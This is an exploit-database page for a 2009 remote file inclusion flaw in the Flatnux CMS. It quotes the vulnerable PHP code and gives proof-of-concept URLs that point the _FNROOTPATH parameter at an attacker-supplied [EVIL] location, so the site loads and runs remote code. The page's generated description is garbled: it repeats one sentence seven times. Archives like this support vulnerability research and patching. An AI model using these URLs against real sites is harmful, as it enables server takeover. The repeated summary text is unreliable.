header-logo
Suggest Exploit
vendor:
Flatnux
by:
Alfons Luja
7.5
CVSS
HIGH
Remote File Inclusion (RFI)
94
CWE
Product Name: Flatnux
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Flatnux-2009-01-27 RFI

Flatnux is vulnerable to Remote File Inclusion (RFI) due to the lack of input validation in the include/theme.php and flatnux.php files. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. The malicious URL contains the malicious code which will be executed on the vulnerable application. The malicious code can be sent to the vulnerable application via the _FNROOTPATH parameter in the URL. The malicious code can be sent to the vulnerable application via the _FNROOTPATH parameter in the URL. The malicious code can be sent to the vulnerable application via the _FNROOTPATH parameter in the URL. The malicious code can be sent to the vulnerable application via the _FNROOTPATH parameter in the URL. The malicious code can be sent to the vulnerable application via the _FNROOTPATH parameter in the URL. The malicious code can be sent to the vulnerable application via the _FNROOTPATH parameter in the URL. The malicious code can be sent to the vulnerable application via the _FNROOTPATH parameter in the URL.

Mitigation:

Input validation should be implemented to prevent Remote File Inclusion (RFI) attacks. The application should also be configured to only allow access to trusted files.
Source

Exploit-DB raw data:

@ flatnux Flatnux-2009-01-27 RFI
  zależności P 
  + Alfons Luja 
  + 2009 
  + grts : All friends
  
  
  VULN : 
       +++ include/theme.php
         ... 
        <?php
          if (eregi("theme.php", $_SERVER['PHP_SELF']))
	     die();                         // 0 <-- I dont give a fuck 
	

             global $theme, $_FNROOTPATH,$lang;   //<-- 1 
             global $forumback, $forumborder;       
             $_FN['table_background']=&$forumback;
             $_FN['table_border']=&$forumborder;


             if ($forumback=="" && $forumborder==""){
	        $forumback="ffffff";
	        $forumborder="000000";
                }
                require_once ($_FNROOTPATH . "themes/$theme/theme.php");

             /*------- Funzioni ridefinibili da theme.php--------------*/
         //......
      +++ /flatnux.php line 116:
            
           //$_FNROOTPATH Still dont have value 
           include_once "./include/theme.php";   //-- 2
          
      +++ /filemanager.php 
          include "./include/flatnux.php"; // -- RFI

  p0c:
     http://localhost/~flatnux/index.php?_FNROOTPATH=[EVIL]%00    
     http://localhost/~flatnux/filemanager.php?mod=&op=&dir=/&opmod=newfile&filemanager_editor=tfuj_stary&_FNROOTPATH=[EVIl]%OO
     ... itd ...

  --http://www.wrzuta.pl/audio/xLyg0zckZS/--
  #EŁOF lol

# milw0rm.com [2009-02-03]

Navigation

Suggest Exploit

Services By CQR